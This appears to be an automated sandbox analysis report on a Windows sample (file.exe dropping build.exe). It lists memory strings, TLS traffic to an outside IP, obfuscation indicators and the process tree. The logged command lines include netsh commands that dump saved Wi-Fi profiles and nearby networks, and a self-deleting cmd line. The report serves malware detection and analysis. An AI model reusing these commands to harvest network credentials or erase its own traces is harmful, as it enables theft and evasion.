Source: build.exe, 00000002.00000002.2301595940.0000026B76CAE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2301595940.0000026B76CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp, build.exe.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: build.exe, 00000002.00000002.2301595940.0000026B76C54000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: build.exe, 00000002.00000002.2301595940.0000026B76CAE000.00000004.00000800.00020000.00000000.sdmp, build.exe, 00000002.00000002.2301595940.0000026B76CB6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: build.exe, 00000002.00000002.2301595940.0000026B76CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63170
Source: unknown	Network traffic detected: HTTP traffic on port 63170 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:63170 version: TLS 1.2

System Summary

.NET source code contains very large strings

Source: build.exe.0.dr, cb9tD6.cs	Long String: Length: 11394
Source: 0.2.file.exe.3685570.1.raw.unpack, cb9tD6.cs	Long String: Length: 11394
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, cb9tD6.cs	Long String: Length: 11394

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE9D2B NtQueryInformationToken,	2_2_00007FFAACCE9D2B
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCEB115 NtQueryInformationToken,	2_2_00007FFAACCEB115
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCEB305 NtQueryInformationToken,	2_2_00007FFAACCEB305

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE304C	2_2_00007FFAACCE304C
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCEEFFA	2_2_00007FFAACCEEFFA
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE7285	2_2_00007FFAACCE7285

Enables driver privileges

Source: C:\Users\user\AppData\Local\Temp\build.exe

Process token adjusted: Load Driver

Source: file.exe, 00000000.00000000.1233237472.00000000002F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFileName vs file.exe
Source: file.exe, 00000000.00000002.1238204446.0000000003685000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenames3c8aa2da262e434f4e3f03592028b88bd3d913.exed" vs file.exe
Source: file.exe, 00000000.00000002.1237653819.00000000008A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenames3c8aa2da262e4 vs file.exe
Source: file.exe, 00000000.00000002.1237653819.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe	Binary or memory string: OriginalFileName vs file.exe

Source: build.exe.0.dr, dD4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, dD4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3685570.1.raw.unpack, dD4.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: build.exe.0.dr, crH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: build.exe.0.dr, crH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3685570.1.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.file.exe.3685570.1.raw.unpack, crH.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Users\user\AppData\Local\Temp\build.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\build.exe	Mutant created: \Sessions\1\BaseNamedObjects\560ppofpuc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7404:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7236:120:WilError_03

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\build.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /R /C:"[ ]:[ ]"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr "SSID BSSID Signal"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 3	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE477E push ds; iretd	2_2_00007FFAACCE477F
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE214D push ebx; iretd	2_2_00007FFAACCE21CA
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE00BD pushad ; iretd	2_2_00007FFAACCE00C1
Source: C:\Users\user\AppData\Local\Temp\build.exe	Code function: 2_2_00007FFAACCE4BD3 pushad ; retf	2_2_00007FFAACCE4BD9

Source: build.exe.0.dr, zlj0Ou.cs	High entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
Source: 0.2.file.exe.3685570.1.raw.unpack, zlj0Ou.cs	High entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'
Source: 0.2.file.exe.36bd1e8.0.raw.unpack, zlj0Ou.cs	High entropy of concatenated method names: 'ToString', 'nGK', 'pv', 'no', 'e4VYI', 'iuPLV', 'x6AFVn', 'uC', 'gm', 'lN'

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Memory allocated: A60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory allocated: 2490000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 26B64FA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Memory allocated: 26B7EAC0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599544	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598672	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598125	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597906	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597797	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597687	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597469	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597359	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597141	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 597031	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596812	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596703	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596155	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 596047	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595826	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595719	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Thread delayed: delay time: 595609	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 2744			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe	Window / User API: threadDelayed 7127			Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 4892	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599544s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598562s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598125s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -598015s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597906s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597797s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597687s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597469s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597359s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597250s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597141s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -597031s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596922s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596812s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596703s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596594s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596484s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7704	Thread sleep time: -596265s >= -30000s	Jump to behavior
